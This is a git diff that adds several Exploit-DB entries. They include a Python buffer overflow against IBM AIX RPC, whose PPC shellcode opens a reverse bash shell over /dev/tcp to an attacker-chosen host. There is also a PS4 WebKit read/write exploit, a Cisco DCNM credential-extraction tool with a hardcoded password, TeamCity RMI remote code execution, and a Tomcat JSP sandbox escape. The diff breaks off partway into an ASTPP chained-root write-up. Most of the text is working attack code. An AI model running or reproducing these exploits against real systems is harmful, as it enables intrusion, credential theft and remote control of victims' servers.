diff --git a/exploits/hardware/remote/47888.py b/exploits/hardware/remote/47888.py
new file mode 100755
index 000000000..4141780a0
--- /dev/null
+++ b/exploits/hardware/remote/47888.py
@@ -0,0 +1,256 @@
+# Exploit Title: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
+# Date: 2018-09-19
+# Exploit Author: Harrison Neal
+# Vendor Homepage: https://www.ibm.com/us-en/
+# Version: 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, 7200-01-01-1642
+# Tested on: IBM AIX PPC
+# CVE: CVE-2017-3623
+# EBBISLAND / EBBSHAVE RPC Buffer Overflow for IBM AIX PPC
+
+
+#!/usr/bin/python
+# Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc
+
+# Exploit code example; shellcode requires /usr/bin/bash on the target
+
+# Example values for my AIX 7.2 LPAR:
+# gid_base: 3007d390
+# execl_func: d0307940
+# execl_toc: f081bc20
+
+# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled
+
+from os import urandom
+from socket import socket, AF_INET, SOCK_STREAM
+from struct import pack, unpack
+from sys import argv, exit
+from time import time, sleep
+
+def getCredLoopbackBody():
+ global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
+
+ epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
+
+ # Doesn't matter, ljust call assumes len <= 4
+ node_name = 'hn'
+ node_length = pack('>I', len(node_name))
+ node_name = node_name.ljust(4, '\x00')
+
+ # Also doesn't matter
+ uid = pack('>I', 0)
+ gid = pack('>I', 0)
+
+ # Big enough to trigger an overflow
+ # Not big enough to trigger defensive code
+ # You could make this a little bit less,
+ # but you'd have to tweak the part 2 code
+ gids_len = pack('>I', 64)
+
+ base_addr = pack('>I', gid_base)
+ addr_8c = pack('>I', gid_base + 0x8c)
+ addr_a8 = pack('>I', gid_base + 0xa8)
+ addr_4c = pack('>I', gid_base + 0x4c)
+
+ func_addr = pack('>I', execl_func)
+ toc_addr = pack('>I', execl_toc)
+
+ cmd = 'bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1'
+ cmd = cmd.ljust(0x30, '\x00')
+
+ # Each GID is 4 bytes long, we want 64
+ gids = (
+ # +0x0 # filepath
+ '/usr/bin/bash\x00\x00\x00'
+
+ # +0x10 # argv[0]
+ 'bash\x00\x00\x00\x00'
+
+ # +0x18 # argv[1]
+ '-c\x00\x00'
+
+ # +0x1c # argv[2]
+ ) + cmd + (
+
+ # +0x4c # r3 = filepath
+ '\x70\x63\x00\x00' # andi. r3, r3, 0x0
+ '\x3c\x60'
+ ) + base_addr[0:2] + ( # lis r3, ...
+ '\x60\x63'
+ ) + base_addr[2:4] + ( # ori r3, r3, ...
+
+ # +0x58 # r4 = argv[0]
+ '\x38\x83\x00\x10' # addi r4, r3, 0x10
+
+ # +0x5c # r5 = argv[1]
+ '\x38\xa4\x00\x08' # addi r5, r4, 0x8
+
+ # +0x60 # r6 = argv[2]
+ '\x38\xc5\x00\x04' # addi r6, r5, 0x4
+
+ # +0x64 # r7 = NULL
+ '\x70\xe7\x00\x00' # andi. r7, r7, 0x0
+
+ # +0x68 # r2 = libc.a TOC for execl
+ '\x70\x42\x00\x00' # andi. r2, r2, 0x0
+ '\x3c\x40'
+ ) + toc_addr[0:2] + ( # lis r2, ...
+ '\x60\x42'
+ ) + toc_addr[2:4] + ( # ori r2, r2, ...
+
+ # +0x74 # execl
+ '\x71\x08\x00\x00' # andi. r8, r8, 0x0
+ '\x3d\x00'
+ ) + func_addr[0:2] + ( # lis r8, ...
+ '\x61\x08'
+ ) + func_addr[2:4] + ( # ori r8, ...
+ '\x7d\x09\x03\xa6' # mtctr r8
+ '\x4e\x80\x04\x21' # bctrl
+
+ # +0x88 # 0x14 padding
+ 'AAAAAAAAAAAAAAAAAAAA'
+
+ # +0x9c # Will be NULL
+ 'ZZZZ'
+
+ # +0xa0
+ # @+948: r5 = +0x8c
+ # @+968: r5 = *(+0x8c + 0x18) = *(+0xa4)
+
+ # +0xa4
+ # @+968: r5 = +0xa8
+ # @+972: r0 = *(r5 + 0x0) = *(+0xa8)
+
+ # +0xa8
+ # @+972: r0 = +0x4c
+ # @+980: ctr = r0 = +0x4c
+ # @+988: branch to ctr
+ ) + addr_8c + addr_a8 + addr_4c + (
+
+ # +0xac # padding
+ 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
+ )
+
+ print ":".join("{:02x}".format(ord(c)) for c in gids)
+ print len(gids)
+
+ return epoch + node_length + node_name + uid + gid + gids_len + gids
+
+def getCredLoopback():
+ cred_flavor = pack('>I', 0x55de) # AUTH_LOOPBACK
+
+ cred_body = getCredLoopbackBody()
+ cred_len = pack('>I', len(cred_body))
+
+ return cred_flavor + cred_len + cred_body
+
+def getAuthNone():
+ auth_flavor = pack('>I', 0) # AUTH_NONE
+
+ auth_len = pack('>I', 0)
+
+ return auth_flavor + auth_len
+
+def getMessage(prog_num, ver_num, proc_num, use_loopback_cred):
+ xid = urandom(4)
+
+ mtype = pack('>I', 0) # CALL
+
+ rpcvers = pack('>I', 2)
+
+ prog = pack('>I', prog_num)
+ vers = pack('>I', ver_num)
+
+ proc = pack('>I', proc_num)
+
+ cred = ( getCredLoopback() if use_loopback_cred else getAuthNone() )
+
+ verf = getAuthNone()
+
+ return xid + mtype + rpcvers + prog + vers + proc + cred + verf
+
+def getPacket(message):
+ # MSB on = this is the last fragment
+ # LSBs = fragment length
+ frag = pack('>I', len(message) + 0x80000000)
+
+ return frag + message
+
+if len(argv) < 7:
+ print 'Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc'
+ exit(1)
+
+rhost = argv[1]
+lhost = argv[2]
+lport = argv[3]
+gid_base = int(argv[4], 16)
+execl_func = int(argv[5], 16)
+execl_toc = int(argv[6], 16)
+
+# Query the portmapper for services
+
+services = []
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((rhost, 111)) # port 111 for portmapper
+s.send(getPacket(getMessage(
+ 100000, # portmapper
+ 2, # version 2
+ 4, # DUMP
+ False # unauth request
+ )))
+
+s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
+
+while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
+ prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
+ if (prog_num == 100024 # status
+ and proto_num == 6): # TCP
+ print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
+ services.append((prog_num, ver_num, port))
+
+s.close()
+
+# Try attacking
+
+for service in services:
+ prog_num, ver_num, port = service
+
+ serv_str = str(prog_num) + ' v' + str(ver_num)
+
+ for attack in [False, True]:
+ sleep(1) # be gentle
+
+ print '[ ] ' + ( 'Attacking' if attack else 'Pinging' ) + ' ' + serv_str
+
+ s = socket(AF_INET, SOCK_STREAM)
+ s.connect((rhost, port))
+
+ resp_len = 0
+
+ s.send(getPacket(getMessage(
+ prog_num,
+ ver_num,
+ 0, # NULL, acts like a ping
+ attack
+ )))
+
+ s.settimeout(5) # give inetd/... a chance to spin up the service if needed
+
+ try:
+ resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
+ except:
+ resp_len = 0 # typically either timeout, connection error, or Ctrl+C
+
+ try:
+ s.close() # try closing the connection if it isn't already dead
+ except:
+ pass # connection is probably already dead
+
+ print '[ ] Got response length ' + str(resp_len)
+
+ if resp_len == 0: # suspect the service either timed out or crashed
+ if attack:
+ print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
+ else:
+ print '[-] Service probably down or otherwise misbehaving, skipping...'
+ break
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47893.js b/exploits/hardware/webapps/47893.js
new file mode 100644
index 000000000..820ef5d7c
--- /dev/null
+++ b/exploits/hardware/webapps/47893.js
@@ -0,0 +1,267 @@
+/*
+
+bad_hoist
+============
+
+Exploit implementation of
+[CVE-2018-4386](https://bugs.chromium.org/p/project-zero/issues/detail?id=1665).
+Obtains addrof/fakeobj and arbitrary read/write primitives.
+
+Supports PS4 consoles on 6.XX. May also work on older firmware versions,
+but I am not sure. Bug was fixed in firmware 7.00.
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47893.zip
+*/
+
+
+var STRUCTURE_SPRAY_SIZE = 0x1800;
+
+var g_confuse_obj = null;
+var g_arb_master = null;
+var g_arb_slave = new Uint8Array(0x2000);
+var g_leaker = {};
+var g_leaker_addr = null;
+var g_structure_spray = [];
+
+var dub = new Int64(0x41414141, 0x41414141).asDouble();
+var g_inline_obj = {
+ a: dub,
+ b: dub,
+};
+
+function spray_structs() {
+ for (var i = 0; i < STRUCTURE_SPRAY_SIZE; i++) {
+ var a = new Uint32Array(0x1)
+ a["p" + i] = 0x1337;
+ g_structure_spray.push(a); // keep the Structure objects alive.
+ }
+
+}
+
+function trigger() {
+
+ var o = {
+ 'a': 1
+ };
+
+ var test = new ArrayBuffer(0x100000);
+ g_confuse_obj = {};
+
+ var cell = {
+ js_cell_header: new Int64([
+ 0x00, 0x8, 0x00, 0x00, // m_structureID, current guess
+ 0x0, // m_indexingType
+ 0x27, // m_type, Float64Array
+ 0x18, // m_flags, OverridesGetOwnPropertySlot |
+ // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
+ 0x1 // m_cellState, NewWhite
+ ]).asJSValue(),
+ butterfly: false, // Some arbitrary value
+ vector: g_inline_obj,
+ len_and_flags: (new Int64('0x0001000100000020')).asJSValue()
+ };
+
+ g_confuse_obj[0 + "a"] = cell;
+
+ g_confuse_obj[1 + "a"] = {};
+ g_confuse_obj[1 + "b"] = {};
+ g_confuse_obj[1 + "c"] = {};
+ g_confuse_obj[1 + "d"] = {};
+
+
+ for (var j = 0x5; j < 0x20; j++) {
+ g_confuse_obj[j + "a"] = new Uint32Array(test);
+ }
+
+ for (var k in o) {
+ {
+ k = {
+ a: g_confuse_obj,
+ b: new ArrayBuffer(test.buffer),
+ c: new ArrayBuffer(test.buffer),
+ d: new ArrayBuffer(test.buffer),
+ e: new ArrayBuffer(test.buffer),
+ 1: new ArrayBuffer(test.buffer),
+
+ };
+
+ function k() {
+ return k;
+ }
+
+ }
+
+ o[k];
+
+ if (g_confuse_obj["0a"] instanceof Uint32Array) {
+ return;
+ }
+ }
+}
+
+function setup_arb_rw() {
+ var jsCellHeader = new Int64([
+ 0x00, 0x08, 0x00, 0x00, // m_structureID, current guess
+ 0x0, // m_indexingType
+ 0x27, // m_type, Float64Array
+ 0x18, // m_flags, OverridesGetOwnPropertySlot |
+ // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
+ 0x1 // m_cellState, NewWhite
+ ]);
+ g_fake_container = {
+ jsCellHeader: jsCellHeader.asJSValue(),
+ butterfly: false, // Some arbitrary value
+ vector: g_arb_slave,
+ lengthAndFlags: (new Int64('0x0001000000000020')).asJSValue()
+ };
+
+ g_inline_obj.a = g_fake_container;
+ g_confuse_obj["0a"][0x4] += 0x10;
+ g_arb_master = g_inline_obj.a;
+ g_arb_master[0x6] = 0xFFFFFFF0;
+}
+
+function read(addr, length) {
+ if (!(addr instanceof Int64))
+ addr = new Int64(addr);
+
+ g_arb_master[4] = addr.low32();
+ g_arb_master[5] = addr.hi32();
+
+ var a = new Array(length);
+
+ for (var i = 0; i < length; i++)
+ a[i] = g_arb_slave[i];
+ return a;
+}
+
+function read8(addr) {
+ return read(addr, 1)[0];
+}
+
+function read16(addr) {
+ return Struct.unpack(Struct.int16, read(addr, 2));
+}
+
+function read32(addr) {
+ return Struct.unpack(Struct.int32, read(addr, 4));
+}
+
+function read64(addr) {
+ return new Int64(read(addr, 8));
+}
+
+function readstr(addr) {
+ if (!(addr instanceof Int64))
+ addr = new Int64(addr);
+ g_arb_master[4] = addr.low32();
+ g_arb_master[5] = addr.hi32();
+ var a = [];
+ for (var i = 0;; i++) {
+ if (g_arb_slave[i] == 0) {
+ break;
+ }
+ a[i] = g_arb_slave[i];
+ }
+ return String.fromCharCode.apply(null, a);
+}
+
+function write(addr, data) {
+ if (!(addr instanceof Int64))
+ addr = new Int64(addr);
+ g_arb_master[4] = addr.low32();
+ g_arb_master[5] = addr.hi32();
+ for (var i = 0; i < data.length; i++)
+ g_arb_slave[i] = data[i];
+}
+
+function write8(addr, val) {
+ write(addr, [val]);
+}
+
+function write16(addr, val) {
+ write(addr, Struct.pack(Struct.int16, val));
+}
+
+
+function write32(addr, val) {
+ write(addr, Struct.pack(Struct.int32, val));
+}
+
+function write64(addr, val) {
+ if (!(val instanceof Int64))
+ val = new Int64(val);
+ write(addr, val.bytes());
+}
+
+function writestr(addr, str) {
+ if (!(addr instanceof Int64))
+ addr = new Int64(addr);
+ g_arb_master[4] = addr.low32();
+ g_arb_master[5] = addr.hi32();
+ for (var i = 0; i < str.length; i++)
+ g_arb_slave[i] = str.charCodeAt(i);
+ g_arb_slave[str.length] = 0; // null character
+}
+
+
+function setup_obj_leaks() {
+ g_leaker.leak = false;
+ g_inline_obj.a = g_leaker;
+ g_leaker_addr = new Int64(g_confuse_obj["0a"][4], g_confuse_obj["0a"][5]).add(0x10);
+ debug_log("obj_leaker address @ " + g_leaker_addr);
+}
+
+function addrof(obj) {
+ g_leaker.leak = obj;
+ return read64(g_leaker_addr);
+}
+
+function fakeobj(addr) {
+ write64(g_leaker_addr, addr);
+ return g_leaker.leak;
+}
+
+function typed_array_buf_addr(typed_array) {
+ return read64(addrof(typed_array).add(0x10));
+}
+
+function cleanup() {
+ var u32array = new Uint32Array(8);
+ header = read(addrof(u32array), 0x10);
+ write(addrof(g_arb_master), header);
+ write(addrof(g_confuse_obj['0a']), header);
+
+ // Set length to 0x10 and flags to 0x1
+ // Will behave as OversizeTypedArray which can survive gc easily
+ write32(addrof(g_arb_master).add(0x18), 0x10);
+ write32(addrof(g_arb_master).add(0x1C), 0x1); //
+ write32(addrof(g_confuse_obj['0a']).add(0x18), 0x10);
+ write32(addrof(g_confuse_obj['0a']).add(0x1C), 0x1);
+ write32(addrof(g_arb_slave).add(0x1C), 0x1);
+
+ var empty = {};
+ header = read(addrof(empty), 0x8);
+ write(addrof(g_fake_container), header);
+}
+
+function start_exploit() {
+ debug_log("Spraying Structures...");
+ spray_structs();
+ debug_log("Structures sprayed!");
+ debug_log("Triggering bug...");
+ trigger();
+ debug_log("Bug successfully triggered!");
+ debug_log("Crafting fake array for arbitrary read and write...");
+ setup_arb_rw();
+ debug_log("Array crafted!");
+ debug_log("Setting up arbitrary object leaks...");
+ setup_obj_leaks();
+ debug_log("Arbitrary object leaks achieved!");
+ debug_log("Cleaning up corrupted structures...");
+ cleanup();
+ debug_log("Cleanup done!");
+ debug_log("Starting post exploitation...");
+}
+
+start_exploit();
\ No newline at end of file
diff --git a/exploits/java/remote/47885.txt b/exploits/java/remote/47885.txt
new file mode 100644
index 000000000..968d90bdb
--- /dev/null
+++ b/exploits/java/remote/47885.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
+# Date: 2020-01-06
+# Exploit Author: Harrison Neal
+# Vendor Homepage: https://www.cisco.com/
+# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
+# Version: 10.4(2)
+# CVE: CVE-2019-15999
+
+# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
+# To compile, file path should match ${package}/${class}.java, e.g.,
+# com/whatdidibreak/dcnm_expl/Main.java
+
+# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]
+
+package com.whatdidibreak.dcnm_expl;
+
+import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
+import com.cisco.dcbu.jaxws.wo.DBRowDO;
+import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;
+
+import java.util.Properties;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+
+public class Main {
+
+ public static void main(String[] args) throws Throwable {
+ for (String target : args) {
+ System.out.println("Target: " + target);
+
+ Properties jndiProps = new Properties();
+ jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
+ jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
+ jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
+ jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
+ jndiProps.put("jboss.naming.client.ejb.context", true);
+
+ Context ctx = new InitialContext(jndiProps);
+
+ DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");
+
+ for (DBRowDO row : i.getServerProperties(null).getRows()) {
+ String propName = row.getEntry()[0];
+ String propValue = row.getEntry()[1];
+
+ if (propValue.isEmpty()) {
+ continue;
+ }
+
+ if (propName.contains("user")) {
+ System.out.println(propName + " = " + propValue);
+ } else if (propName.contains("pass")) {
+ System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
+ }
+ }
+
+ System.out.println();
+ }
+ }
+}
\ No newline at end of file
diff --git a/exploits/java/remote/47891.txt b/exploits/java/remote/47891.txt
new file mode 100644
index 000000000..f353fe0ae
--- /dev/null
+++ b/exploits/java/remote/47891.txt
@@ -0,0 +1,149 @@
+# Exploit Title: JetBrains TeamCity 2018.2.4 - Remote Code Execution
+# Date: 2020-01-07
+# Exploit Author: Harrison Neal
+# Vendor Homepage: https://www.jetbrains.com/
+# Software Link: https://confluence.jetbrains.com/display/TW/Previous+Releases+Downloads
+# Version: 2018.2.4 for Windows
+# CVE: CVE-2019-15039
+
+# You'll need a few .jars from a copy of TeamCity to compile and run this code
+# To compile, file path should match ${package}/${class}.java, e.g.,
+# com/whatdidibreak/teamcity_expl/Main.java
+
+# Instructions for Windows (easier case):
+
+# 1) Verify exploitability.
+# 1a) Verify the remote host is running Windows, e.g. checking for common
+# running services and their versions.
+# 1b) Discover Java RMI services on the remote host, e.g. doing a 65k port
+# scan using nmap and the rmi-dumpregistry script. On one port, there
+# should be a registry with an object named teamcity-mavenServer. This
+# object should point to a second open port that is also identified as
+# Java RMI.
+
+# 2) Prepare the payload.
+# 2a) There needs to be an SMB share that the TeamCity software can read from
+# and that you can write to. You might establish a share on your own
+# system and make it accessible to anonymous users. Alternatively, if the
+# TeamCity server is domain-joined, you might find a pre-existing share
+# elsewhere in the domain.
+# 2b) Place a malicious POM in that share, e.g.
+
+
+ 4.0.0
+ com.mycompany.app
+ my-module
+ 1
+
+
+
+ org.codehaus.mojo
+ exec-maven-plugin
+ 1.1.1
+
+
+
+ exec
+
+
+
+
+ calc
+
+ -testarg
+
+
+
+
+
+
+
+# 3) Run this exploit.
+# Argument #1: TeamCity host (IP or FQDN)
+# Argument #2: Port of RMI Registry (the first open port described above)
+# Argument #3: UNC path to the malicious POM file (e.g., \\ip\share\pom.xml)
+# Argument #4: POM goal (e.g., exec:exec)
+
+# NOTE: It is possible to exploit this issue in other situations, e.g. if the
+# TeamCity server is running on a *nix system that allows access to some local
+# directory over NFS.
+
+ */
+package com.whatdidibreak.teamcity_expl;
+
+import java.io.File;
+import java.io.IOException;
+
+import java.net.InetSocketAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.rmi.server.RMISocketFactory;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import jetbrains.buildServer.maven.remote.MavenServer;
+import jetbrains.buildServer.maven.remote.RemoteEmbedder;
+import org.jetbrains.maven.embedder.MavenEmbedderSettings;
+import org.jetbrains.maven.embedder.MavenExecutionResult;
+
+public class Main {
+
+ public static void main(String[] args) throws Throwable {
+ String host = args[0];
+ int port = Integer.parseInt(args[1]);
+ String pomPath = args[2];
+ String goal = args[3];
+
+ // The exported object may point to a different host than what we're
+ // using to connect to the registry, which could break things, i.e.,
+ // - localhost
+ // - for a multi-homed target, an IP we can't connect to
+ // - a FQDN or hostname we can't resolve
+ // - etc.
+ // For this reason, we'll set up a socket factory that forces all
+ // connections to go to the host specified by the user, ignoring the
+ // host pointed to by the exported object.
+ OverrideHostSocketFactory sf = new OverrideHostSocketFactory(host);
+ RMISocketFactory.setSocketFactory(sf);
+
+ // The rest of the code in this method should look fairly typical for
+ // interacting with remote objects using RMI.
+ Registry r = LocateRegistry.getRegistry(host, port, sf);
+
+ MavenServer ms = (MavenServer) r.lookup("teamcity-mavenServer");
+
+ MavenEmbedderSettings mes = new MavenEmbedderSettings();
+ RemoteEmbedder re = ms.exportEmbedder(mes);
+
+ File f = new File(pomPath);
+ List ap = new ArrayList();
+ List g = new ArrayList();
+ g.add(goal);
+ MavenExecutionResult mer = re.execute(f, ap, g);
+ }
+
+ private static class OverrideHostSocketFactory extends RMISocketFactory {
+
+ private String targetHost;
+
+ public OverrideHostSocketFactory(String targetHost) {
+ this.targetHost = targetHost;
+ }
+
+ @Override
+ public Socket createSocket(String host, int port) throws IOException {
+ Socket toReturn = new Socket();
+ toReturn.connect(new InetSocketAddress(targetHost, port));
+ return toReturn;
+ }
+
+ @Override
+ public ServerSocket createServerSocket(int port) throws IOException {
+ throw new UnsupportedOperationException("Not supported yet.");
+ }
+ }
+}
\ No newline at end of file
diff --git a/exploits/java/webapps/47892.txt b/exploits/java/webapps/47892.txt
new file mode 100644
index 000000000..4660790cc
--- /dev/null
+++ b/exploits/java/webapps/47892.txt
@@ -0,0 +1,83 @@
+# Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
+# Date: 2020-01-07
+# Exploit Author: Harrison Neal, PatchAdvisor
+# Vendor Homepage: https://tomcat.apache.org/
+# Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
+# Version: 8.0.36
+# Description: Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape
+# Tested on: Windows
+# CVE: CVE-2016-5018
+ /*
+# See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox.
+# When Tomcat 8 is configured to run as a service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
+# In the Java tab, add the following options:
+# -Djava.security.manager
+# -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
+ */
+
+ <%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
+<%
+ SecurityManager sm = System.getSecurityManager();
+
+ if (sm != null) {
+ try {
+ ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();
+
+ { // Tomcat 7+
+ // Get the desired method
+ Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
+ "${pageContext.getServletContext().getClass().getDeclaredMethods()}",
+ Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7
+
+ Method theMethod = null;
+
+ for (Method m : methods) {
+ if ("executeMethod".equals(m.getName())) {
+ theMethod = m;
+ break;
+ }
+ }
+
+ // Set it to accessible
+ JspRuntimeLibrary.introspecthelper(
+ theMethod,
+ "accessible",
+ "true",
+ request,
+ null,
+ false);
+
+ // Run it
+ theMethod.invoke(pageContext.getServletContext(),
+ System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
+ null,
+ new Object[]{null}
+ );
+ }
+
+ /*{ // Tomcat 5.5 and 6
+ pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
+ PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
+ }*/
+
+ } catch (Throwable ex) {
+ PrintWriter pw = new PrintWriter(out);
+ ex.printStackTrace(pw);
+ pw.flush();
+ }
+ }
+
+ // Your payload goes here
+ try {
+ Runtime.getRuntime().exec("calc");
+ } catch (Throwable ex) {
+ PrintWriter pw = new PrintWriter(out);
+ ex.printStackTrace(pw);
+ pw.flush();
+ }
+
+ // Optional put the security manager back
+ if (sm != null) {
+ System.setSecurityManager(sm);
+ }
+%>
\ No newline at end of file
diff --git a/exploits/linux/remote/47889.txt b/exploits/linux/remote/47889.txt
new file mode 100644
index 000000000..5db71c763
--- /dev/null
+++ b/exploits/linux/remote/47889.txt
@@ -0,0 +1,72 @@
+# Exploit Title: ASTPP VoIP 4.0.1 - Remote Code Execution
+# Date: 2019-11-18
+# Exploit Author: Fabien AUNAY
+# Vendor Homepage: https://www.astppbilling.org/
+# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
+# Version: 4.0.1 vendor default setup script
+# Tested on: Debian 9 - CentOS 7
+# CVE : -
+
+###########################################################################################################
+ASTPP 4.0.1 VoIP Billing Chained Remote Root
+A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
+It is available as an open source solution. It means without any investment, one can start his telephony
+business using ASTPP.
+ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
+comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
+solution to “A Smart TelePhony Platform”.
+The latest version of ASTPP is provisioned with some advanced functional modules which are designed
+to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
+4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
+Technology.
+
+Steps are as follows:
+Objective 1 : Edit the SIP device and try to test user inputs
+Objective 2 : Try to trigger a XSS
+Objective 3 : Try to evade filters
+Objective 4 : Session Hijack
+Objective 5 : Plugin command injection
+Objective 6 : Reverse shell
+Objective 7 : Root the system
+Objective 8 : Looting
+
+###########################################################################################################
+
+Objective 1 : html code in SIP Caller Number
+POC: ASTPP html test
+
+Objective 2 : XSS injection in SIP Caller Name
+POC: